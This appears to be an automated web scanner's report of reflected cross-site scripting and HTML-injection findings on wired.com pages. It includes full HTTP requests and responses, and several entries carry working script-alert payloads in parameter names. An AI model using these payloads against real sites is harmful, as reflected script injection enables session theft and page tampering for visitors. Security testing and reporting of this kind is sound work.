HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29303 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:17 GMT Date: Sun, 21 Nov 2010 23:07:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_artc7c4c"><a>89e1688aab6 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d71fa"><a>b579a399708 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimediad71fa"><a>b579a399708/2008/07/gallery_top_10_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29303 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:33 GMT Date: Sun, 21 Nov 2010 23:07:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimediad71fa"><a>b579a399708"> ...[SNIP]...
1.78. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8377"><script>alert(1)</script>a852d762798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:56 GMT Date: Sun, 21 Nov 2010 23:06:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc57e"><a>6479810cedb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturefc57e"><a>6479810cedb/art/multimedia/2008/10/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturefc57e"><a>6479810cedb ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287df"><a>b9badeee24d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art287df"><a>b9badeee24d/multimedia/2008/10/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:43 GMT Date: Sun, 21 Nov 2010 23:06:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art287df"><a>b9badeee24d c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5771a"><a>9832fc9791e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia5771a"><a>9832fc9791e/2008/10/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia5771a"><a>9832fc9791e"> ...[SNIP]...
1.82. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wired.com
Path:
/culture/art/multimedia/2008/10/gallery_trains
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54b5"><script>alert(1)</script>ea506289b5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42193
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1308"><a>62b113b6ddc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturec1308"><a>62b113b6ddc/art/news/2008/06/submissions_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29288 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:15 GMT Date: Sun, 21 Nov 2010 23:07:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturec1308"><a>62b113b6ddc ss_art c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33b07"><a>51bc0c4125e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art33b07"><a>51bc0c4125e/news/2008/06/submissions_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29288 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:37 GMT Date: Sun, 21 Nov 2010 23:07:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art33b07"><a>51bc0c4125e c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ea3"><a>733ee83aeca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/newsb8ea3"><a>733ee83aeca/2008/06/submissions_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29288 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:49 GMT Date: Sun, 21 Nov 2010 23:07:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_newsb8ea3"><a>733ee83aeca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b187a"><a>710ea181819 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureb187a"><a>710ea181819/culturereviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29273 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Sun, 21 Nov 2010 23:09:50 GMT Date: Sun, 21 Nov 2010 23:06:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureb187a"><a>710ea181819 ss_culturereviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c101a"><a>c9bdd73e8c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/culturereviewsc101a"><a>c9bdd73e8c4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29273 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:27 GMT Date: Sun, 21 Nov 2010 23:06:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_culturereviewsc101a"><a>c9bdd73e8c4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3632"><a>7fc96fc4812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturee3632"><a>7fc96fc4812/design HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29257 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:03 GMT Date: Sun, 21 Nov 2010 23:06:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturee3632"><a>7fc96fc4812 ss_design"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4088a"><a>cab77e397f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/design4088a"><a>cab77e397f3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29257 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:29 GMT Date: Sun, 21 Nov 2010 23:06:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_design4088a"><a>cab77e397f3"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2f5"><a>35b68f7c68f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureda2f5"><a>35b68f7c68f/design/multimedia/2008/06/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29304 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureda2f5"><a>35b68f7c68f ss_design c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4136"><a>4e71b2b298e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/designe4136"><a>4e71b2b298e/multimedia/2008/06/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29304 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:19 GMT Date: Sun, 21 Nov 2010 23:07:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_designe4136"><a>4e71b2b298e c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1447"><a>17257c56c9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/design/multimediae1447"><a>17257c56c9f/2008/06/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29304 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:36 GMT Date: Sun, 21 Nov 2010 23:07:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_design c_multimediae1447"><a>17257c56c9f"> ...[SNIP]...
1.93. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wired.com
Path:
/culture/design/multimedia/2008/06/gallery_trains
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add6e"><script>alert(1)</script>a2b64047b26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41077
